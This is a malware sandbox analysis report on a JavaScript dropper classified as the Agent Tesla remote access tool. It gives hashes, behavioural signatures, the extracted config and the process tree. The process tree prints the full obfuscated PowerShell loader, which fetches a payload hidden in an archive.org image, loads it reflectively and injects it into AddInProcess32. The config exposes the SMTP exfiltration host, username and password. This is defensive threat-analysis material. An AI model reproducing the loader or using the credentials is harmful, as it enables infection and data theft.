Analysis
-
max time kernel
124s -
max time network
125s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2024 02:46
Static task
static1
Behavioral task
behavioral1
Sample
LPO.js
Resource
win7-20240708-en
General
-
Target
LPO.js
-
Size
133KB
-
MD5
de1ff5796636ce90ae34773c2492714f
-
SHA1
a737641923b33bb911f22e8da3bc98849737cd10
-
SHA256
18d1b246a29100b10a3ce587927ebb0c615156352598621da18250f8ad06e318
-
SHA512
e0d4ec7ebce60d0eba1c61db69090144864c7da89f7968a2d4de1c169e661717c5f1f8534fd435a674374f6453278dfa67b11ebb6dd585e4a1daf5071da8f39d
-
SSDEEP
3072:FLGoPD/IMIFiLTJIdmX/ZJYTaLGoPD/IM+:lQMIehmTcQM+
Malware Config
Extracted
https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20
https://ia600101.us.archive.org/1/items/detah-note-j_202410/DetahNote_J.jpg%20
Extracted
Protocol: smtp- Host:
mail.ctdi.com.ph - Port:
587 - Username:
[email protected] - Password:
A#f+Y]H8iO4a
Extracted
agenttesla
Protocol: smtp- Host:
mail.ctdi.com.ph - Port:
587 - Username:
[email protected] - Password:
A#f+Y]H8iO4a - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 3440 powershell.exe 17 3440 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4436 powershell.exe 3440 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3440 set thread context of 2384 3440 powershell.exe 89 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4436 powershell.exe 4436 powershell.exe 3440 powershell.exe 3440 powershell.exe 2384 AddInProcess32.exe 2384 AddInProcess32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4436 powershell.exe Token: SeDebugPrivilege 3440 powershell.exe Token: SeDebugPrivilege 2384 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4068 wrote to memory of 4436 4068 wscript.exe 83 PID 4068 wrote to memory of 4436 4068 wscript.exe 83 PID 4436 wrote to memory of 3440 4436 powershell.exe 87 PID 4436 wrote to memory of 3440 4436 powershell.exe 87 PID 3440 wrote to memory of 2384 3440 powershell.exe 89 PID 3440 wrote to memory of 2384 3440 powershell.exe 89 PID 3440 wrote to memory of 2384 3440 powershell.exe 89 PID 3440 wrote to memory of 2384 3440 powershell.exe 89 PID 3440 wrote to memory of 2384 3440 powershell.exe 89 PID 3440 wrote to memory of 2384 3440 powershell.exe 89 PID 3440 wrote to memory of 2384 3440 powershell.exe 89 PID 3440 wrote to memory of 2384 3440 powershell.exe 89
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\LPO.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAKABHAEUAdAAtAFYAYQBSAEkAYQBCAGwAZQAgACcAKgBNAGQAUgAqACcAKQAuAE4AQQBNAGUAWwAzACwAMQAxACwAMgBdAC0AagBvAGkAbgAnACcAKQAoACgAJwBUAFEARQBpAG0AJwArACcAYQBnAGUAVQByAGwAIAA9ACAAWQB5AGgAaAB0AHQAcABzADoAJwArACcALwAvAGkAYQA2ADAAMAAxADAAMQAuACcAKwAnAHUAcwAuAGEAcgBjAGgAaQAnACsAJwB2AGUALgBvAHIAZwAvADEALwBpAHQAZQBtAHMAJwArACcALwBkAGUAdABhAGgALQBuAG8AdABlAC0AagBfADIAMAAyADQAMQAwAC8ARABlAHQAYQBoAE4AbwB0AGUAXwBKAC4AagBwAGcAIABZAHkAaAA7AFQAUQAnACsAJwBFAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAJwArACcAQwBsAGkAJwArACcAZQBuAHQAOwBUAFEARQAnACsAJwBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAFQAUQBFAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABUAFEARQBpAG0AYQBnAGUAVQByAGwAKQA7AFQAUQBFAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFQAUQBFAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AFQAUQBFAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFkAeQBoADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AWQB5AGgAOwAnACsAJwBUAFEARQBlAG4AZABGAGwAYQBnACAAPQAgAFkAeQBoADwAPABCACcAKwAnAEEAUwBFADYANABfAEUATgAnACsAJwBEAD4APgBZAHkAaAA7AFQAUQBFAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAVABRAEUAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAVABRAEUAcwB0AGEAcgB0AEYAbABhAGcAKQA7AFQAUQBFAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABUAFEARQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABUAFEARQBlAG4AZABGAGwAYQBnACkAOwBUAFEARQBzAHQAJwArACcAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgAFQAUQBFACcAKwAnAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAVABRAEUAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AFQAUQBFAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABUAFEARQAnACsAJwBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAVABRAEUAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAVABRAEUAZQBuAGQASQBuAGQAZQB4ACAALQAgAFQAUQBFAHMAdABhAHIAdABJAG4AZABlACcAKwAnAHgAOwBUAFEARQBiAGEAcwBlADYANABDAG8AbQBtACcAKwAnAGEAbgBkACAAPQAgAFQAUQBFAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABUAFEARQBzAHQAYQByAHQASQAnACsAJwBuAGQAZQB4ACwAIABUAFEARQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAVABRAEUAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCACcAKwAnAGEAJwArACcAcwBlADYANABTAHQAcgBpAG4AJwArACcAZwAoAFQAUQBFAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7AFQAUQBFACcAKwAnAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMAG8AYQBkACgAJwArACcAVABRAEUAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AFQAUQBFAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABZAHkAaABWAEEASQBZAHkAaAApADsAVABRAEUAdgBhAGkATQAnACsAJwBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAFQAUQBFAG4AdQBsAGwALAAgAEAAKABZAHkAaAB0AHgAdAAuAGEAZABhAHkAaQAvAHYAZQBkAC4AMgByAC4AMwA5AGIAMwA0ADUAMwAwADIAYQAwADcANQBiADEAYgBjADAAZAA0ADUAYgA2ADMAMgBlAGIAOQBlAGUANgAyACcAKwAnAC0AJwArACcAYgB1ACcAKwAnAHAALwAvADoAcwBwAHQAdABoAFkAeQBoACwAIABZAHkAaABkAGUAcwBhAHQAaQB2AGEAZABvAFkAeQBoACwAIABZAHkAaABkAGUAJwArACcAcwBhAHQAaQB2AGEAZABvAFkAeQBoACwAIABZAHkAaABkAGUAcwBhAHQAaQB2AGEAZABvAFkAeQBoACwAIABZAHkAaABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIAWQB5AGgALAAgAFkAeQBoAGQAZQBzAGEAdABpAHYAYQBkAG8AWQB5ACcAKwAnAGgALAAnACsAJwAgAFkAeQBoAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AWQB5AGgAKQApADsAJwApAC4AUgBlAHAAbABhAGMARQAoACgAWwBjAGgAQQByAF0AOAA0ACsAWwBjAGgAQQByAF0AOAAxACsAWwBjAGgAQQByAF0ANgA5ACkALABbAHMAVAByAGkATgBHAF0AWwBjAGgAQQByAF0AMwA2ACkALgBSAGUAcABsAGEAYwBFACgAKABbAGMAaABBAHIAXQA4ADkAKwBbAGMAaABBAHIAXQAxADIAMQArAFsAYwBoAEEAcgBdADEAMAA0ACkALABbAHMAVAByAGkATgBHAF0AWwBjAGgAQQByAF0AMwA5ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((GEt-VaRIaBle '*MdR*').NAMe[3,11,2]-join'')(('TQEim'+'ageUrl = Yyhhttps:'+'//ia600101.'+'us.archi'+'ve.org/1/items'+'/detah-note-j_202410/DetahNote_J.jpg Yyh;TQ'+'EwebClient = New-Object System.Net.Web'+'Cli'+'ent;TQE'+'imageBytes = TQEwebClient.DownloadData(TQEimageUrl);TQEimageText = [System.Text.Encoding]::UTF8.GetString(TQEimageBytes);TQEstartFlag = Yyh<<BASE64_START>>Yyh;'+'TQEendFlag = Yyh<<B'+'ASE64_EN'+'D>>Yyh;TQEstartIndex = TQEimageText.IndexOf(TQEstartFlag);TQEendIndex = TQEimageText.IndexOf(TQEendFlag);TQEst'+'artIndex -ge 0 -and TQE'+'endIndex -gt TQEstartIndex;TQEstartIndex += TQE'+'startFlag.Length;TQEbase64Length = TQEendIndex - TQEstartInde'+'x;TQEbase64Comm'+'and = TQEimageText.Substring(TQEstartI'+'ndex, TQEbase64Length);TQEcommandBytes = [System.Convert]::FromB'+'a'+'se64Strin'+'g(TQEbase64Command);TQE'+'loadedAssembly = [System.Reflection.Assemb'+'ly]::Load('+'TQEcommandBytes);TQEvaiMethod = [dnlib.IO.Home].GetMethod(YyhVAIYyh);TQEvaiM'+'ethod.Invoke(TQEnull, @(Yyhtxt.adayi/ved.2r.39b345302a075b1bc0d45b632eb9ee62'+'-'+'bu'+'p//:sptthYyh, YyhdesativadoYyh, Yyhde'+'sativadoYyh, YyhdesativadoYyh, YyhAddInProcess32Yyh, YyhdesativadoYy'+'h,'+' Yyhdesativa'+'doYyh));').ReplacE(([chAr]84+[chAr]81+[chAr]69),[sTriNG][chAr]36).ReplacE(([chAr]89+[chAr]121+[chAr]104),[sTriNG][chAr]39) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD581d91bab2fdd72436e4852d94ea7650d
SHA15652b3c46a0cf75a03859c5707f36fb08f5c631a
SHA25668a3392780a3c6219350a2ca51262a74a2a9d6a1ea84686f38d473f37d0588e1
SHA512df1e3da61c9657a7f0c0eac9ce610798421e138259ec2bf41063b8e8eb8e1c9e6d669aaba675ba16ccdceed1aa3f76b482893dc98f3d6b46cd48d61da7669268
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82